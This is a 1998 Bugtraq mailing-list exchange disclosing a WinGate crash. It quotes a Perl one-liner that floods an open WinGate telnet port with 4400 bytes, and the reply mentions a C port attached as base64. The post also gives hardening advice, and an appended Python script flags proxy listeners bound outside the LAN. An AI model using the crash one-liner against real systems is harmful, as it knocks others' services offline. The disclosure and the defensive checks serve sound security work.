[8562] in bugtraq
Re: crashing wingates
daemon@ATHENA.MIT.EDU (Eric Wanner)
Sat Nov 14 21:18:53 1998
Date: Sat, 14 Nov 1998 17:52:13 -0700
Reply-To: Eric Wanner <ericw@FUTUREONE.COM>
From: Eric Wanner <ericw@FUTUREONE.COM>
X-To: G23 <g23@USA.NET>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <19981113182512.18823.qmail@www01.netaddress.usa.net>
Well, here is my C version of your script =). It takes the host and
optional port as arguments. Compiled and ran on several
slackware-linux/x86 boxes. Just more proof that wingate is way too
insecure to leave an opening to the outside.
--
Eric Wanner
Head Systems Administrator
FutureOne, Inc.
602-385-3379
http://home.futureone.com
On Sat, 14 Nov 1998, G23 wrote:
> Hello,
>
> The following one-liner will crash an open Wingate.
>
> perl -MIO::Socket -e \
> 'IO::Socket::INET->new(PeerAddr=>"wingate.to.hoze:23")\
> ->send("X" x 4400 . "\n",0)'
>
> Unfortunately I don't have access to one that I can test, so I am unable to verify what versions are vulnerable. The above is my rendition of a 44 line sh script written by "rEWTED" (kefka@infected.org).
>
> Anyone configuring a proxy for LAN use should only bind to an internal
> interface anyway. (IE, kidz shouldn't even see your proxy)
> http://wingate.net/helppages/wingate2Securing_your_network.html
>
> If you do provide telnet proxy for the world, then at least log.
> http://wingate.net/helppages/wingate2Auditing_and_Logging.html
>
> ghost23
[Attachment: wingatecrash.c, base64-encoded]
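The quoted advice to bind the proxy only to an internal interface can be checked from `netstat -an` output taken on the proxy host. The following is an added example, not code from either poster or from WinGate; the sample output, the ports other than 23, and the function name are constructed assumptions.

```python
import ipaddress

# Constructed sample of Windows `netstat -an` output (not from the original post).
# 203.0.113.10 is a documentation address standing in for a public interface.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    192.168.0.1:1080       0.0.0.0:0              LISTENING
  TCP    203.0.113.10:8080      0.0.0.0:0              LISTENING
  TCP    127.0.0.1:23           0.0.0.0:0              LISTENING
  TCP    192.168.0.1:23         192.168.0.7:1034       ESTABLISHED
"""

# Port 23 is the telnet proxy from the post; 1080 and 8080 are assumed extras.
PROXY_PORTS = {23, 1080, 8080}

# Addresses treated as internal: RFC 1918 ranges plus loopback.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def exposed_listeners(netstat_text, ports=PROXY_PORTS):
    """Return (address, port, reason) for proxy listeners not limited to the LAN."""
    findings = []
    for line in netstat_text.splitlines():
        fields = line.split()
        # Only listening TCP sockets matter; skip headers and live connections.
        if len(fields) < 4 or fields[0].upper() != "TCP" or fields[3].upper() != "LISTENING":
            continue
        host, _, port_text = fields[1].rpartition(":")
        if not port_text.isdigit() or int(port_text) not in ports:
            continue
        try:
            addr = ipaddress.ip_address(host.strip("[]"))  # handles the [::] form
        except ValueError:
            continue  # unparseable local address, ignore the line
        if addr.is_unspecified:
            findings.append((host, int(port_text), "all interfaces"))
        elif not any(addr in net for net in INTERNAL_NETS):
            findings.append((host, int(port_text), "non-internal address"))
    return findings


if __name__ == "__main__":
    for host, port, reason in exposed_listeners(SAMPLE_NETSTAT):
        print(f"port {port} listening on {host}: {reason}")
```

A listener on the wildcard address accepts connections on every interface, so it is reported even when the host also has an internal address.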